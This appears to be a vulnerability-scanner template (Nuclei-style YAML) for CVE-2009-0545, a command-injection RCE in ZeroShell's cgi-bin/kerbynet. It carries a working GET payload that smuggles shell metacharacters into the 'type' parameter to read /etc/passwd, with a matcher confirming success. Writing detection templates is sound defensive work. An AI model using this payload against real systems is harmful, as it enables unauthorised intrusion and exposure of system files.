id: CVE-2009-0545 info: name: ZeroShell <= 1.0beta11 Remote Code Execution author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. remediation: | Upgrade to a patched version of ZeroShell. reference: - https://www.exploit-db.com/exploits/8023 - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 - http://www.zeroshell.net/eng/announcements/ - http://www.ikkisoft.com/stuff/LC-2009-01.txt - http://www.vupen.com/english/advisories/2009/0385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.97081 epss-percentile: 0.99714 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell product: zeroshell tags: edb,cve,cve2009,zeroshell,kerbynet,rce http: - method: GET path: - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" matchers: - type: regex part: body regex: - "root:.*:0:0:" # digest: 4a0a00473045022100ce590f497dc69da786aaf4b165abd35fffcd600a07c4c23e69625fe96b29c6e402200e2db487c122dfeabc421941570910b6564ceae82f13da3d7c348f28193ed8b8:922c64590222798bb761d5b6d8e72950